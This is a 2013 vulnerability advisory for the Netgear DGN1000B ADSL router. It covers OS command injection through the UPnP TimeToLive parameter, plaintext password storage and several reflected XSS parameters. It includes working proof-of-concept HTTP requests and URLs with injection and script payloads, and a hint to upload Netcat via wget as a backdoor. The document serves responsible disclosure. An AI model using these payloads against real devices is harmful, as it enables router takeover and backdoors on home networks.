Netgear DGN1000B XSS / Command Injection

`Device Name: DGN1000B  
Vendor: Netgear  
  
============ Vulnerable Firmware Releases: ============  
  
Firmwareversion: V1.1.00.24  
Firmwareversion: V1.1.00.45  
  
Download: http://downloadcenter.netgear.com/de/product/DGN1000  
  
============ Device Description: ============  
  
The N150 Wireless ADSL2+ Modem Router DGN1000 provides you with an easy and secure way to set up a wireless home network with fast access to the Internet over a high-speed digital subscriber line (DSL). The N150 Modem Router has a built-in DSL modem and is compatible with all major DSL Internet service providers. The security features let you block unsafe Internet content and applications, and protect the devices that you connect to your home network.  
  
Source: http://support.netgear.com/product/DGN1000  
  
============ Shodan Torks ============  
  
Shodan Search: NETGEAR DGN1000  
  
============ Vulnerability Overview: ============  
  
* OS Command Injection in the UPNP configuration:  
  
The vulnerability is caused by missing input validation in the TimeToLive parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to upload and execute a backdoor to compromise the device.  
  
Param: TimeToLive  
POST /setup.cgi HTTP/1.1  
Host: 192.168.178.188  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Referer: http://192.168.178.188/setup.cgi?next_file=upnp.htm  
Authorization: Basic XXX  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 185  
Connection: close  
  
UPnP=UPnP&AdverTime=30&TimeToLive=`%20COMMAND%20`&save=+Anwenden&todo=save&this_file=upnp.htm&next_file=upnp.htm&h_UPnP=enable&hiddenAdverTime=30&hiddenTimeToLive=4  
  
Change the Request Methode from HTTP Post to HTTP GET:  
  
http://192.168.178.188/setup.cgi?UPnP=UPnP&AdverTime=30&TimeToLive=`%20COMMAND%20`&save=+Anwenden&todo=save&this_file=upnp.htm&next_file=upnp.htm&h_UPnP=enable&hiddenAdverTime=30&hiddenTimeToLive=4  
  
  
It is possible to cross compile Netcat and upload it via wget, adjust the permissions and execute it. Have phun ;)  
  
Sources including needed toolchain: http://kb.netgear.com/app/answers/detail/a_id/2649  
direct download: http://www.downloads.netgear.com/files/GPL/DGN1000B_VB1.00.45_GR_src.tar...  
  
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN1000B-os-command-wget-check.png  
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN1000B-r00ted.png  
  
* Insecure Cryptographic Storage:  
  
There is no password hashing implemented and so it is saved in plain text on the system:  
cat /tmp/etc/htpasswd  
admin:password  
  
* XSS  
  
Injecting scripts into the following parameters reveals that these parameters are not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.  
  
-> Sicherheit -> Dienste -> neuen Dienst anlegen -> Dienstname  
  
Param: service_name  
  
http://192.168.178.188/setup.cgi?service_name=%22%3E%3Cimg%20src=%220%22%20onerror=alert%282%29%3E&svc_type=tcp&serv_sport=1&serv_endport=2&save=Anwenden&todo=save&h_svc_type=tcp&edit=1&h_ruleSelect=0&this_file=servinfo.htm&next_file=fw_serv.htm  
  
-> WLAN -> Zugriffsliste anpassen -> Hinzufügen -> Gerätename  
  
Param: device  
  
http://192.168.178.188/setup.cgi?accessLimit=accessLimit&device=%22%3E%3Cimg+src%3D%220%22+onerror=alert(2)>&wirelist_mac=01-11-22-33-44-66&h_accessLimit=enable&h_ruleSelect=0&todo=addmanual&this_file=m_access.htm&next_file=m_access.htm  
  
Param: ssid_num  
  
http://192.168.178.188/setup.cgi?next_file=adv_wireless.htm&ssid_num=a%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&flag=1  
  
Param: h_skeyword  
  
http://192.168.178.188/setup.cgi?skeyword=1&cfKeyWord_Domain=&KeyWordList=0&todo=delete&this_file=keyword.htm&next_file=keyword.htm&h_skeyword=115bcf%22%3E%3Cscript%3Ealert%281%29%3C/script%3Edc575b170bc38bebe&h_KeyWordList=&h_ruleSelect=0&h_trustipenable=disable&c4_Trusted_IPAddress=  
  
Param: cfKeyWord_Domain  
  
http://192.168.178.188/setup.cgi?skeyword=1&cfKeyWord_Domain=5d0a9%3Cscript%3Ealert%281%29%3C/script%3E&todo=addkeyword&this_file=keyword.htm&next_file=keyword.htm&h_skeyword=1&h_KeyWordList=&h_ruleSelect=&h_trustipenable=disable&c4_Trusted_IPAddress=  
  
============ Solution ============  
  
No known solution available.  
  
============ Credits ============  
  
The vulnerability was discovered by Michael Messner  
Mail: devnull#at#s3cur1ty#dot#de  
Web: http://www.s3cur1ty.de  
Advisory URL: http://www.s3cur1ty.de/m1adv2013-005  
Twitter: @s3cur1ty_de  
  
============ Time Line: ============  
  
October 2012 - discovered vulnerability  
15.10.2012 - Privately reported all details to vendor via email  
23.10.2012 - Privately reported all details to vendor via webinterface  
24.10.2012 - Netgear replied to forward the details internally  
31.10.2012 - Netgear closes the case  
31.10.2012 - Requested more details why the case is now closed.  
31.10.2012 - Netgear responded that they will check the state of the case  
06.11.2012 - Netgear requested the Serial Number of the device  
08.11.2012 - Responded with the Serial Number  
13.11.2012 - something goes on - I got a product registration confirmation  
03.12.2012 - Case closed by Netgear - No new firmware available  
16.01.2013 - Netgear contacted me again requesting to check a Beta version  
22.01.2013 - Tested Beta Firmware and gave feedback to vendor  
06.02.2013 - public release  
  
===================== Advisory end =====================  
  
`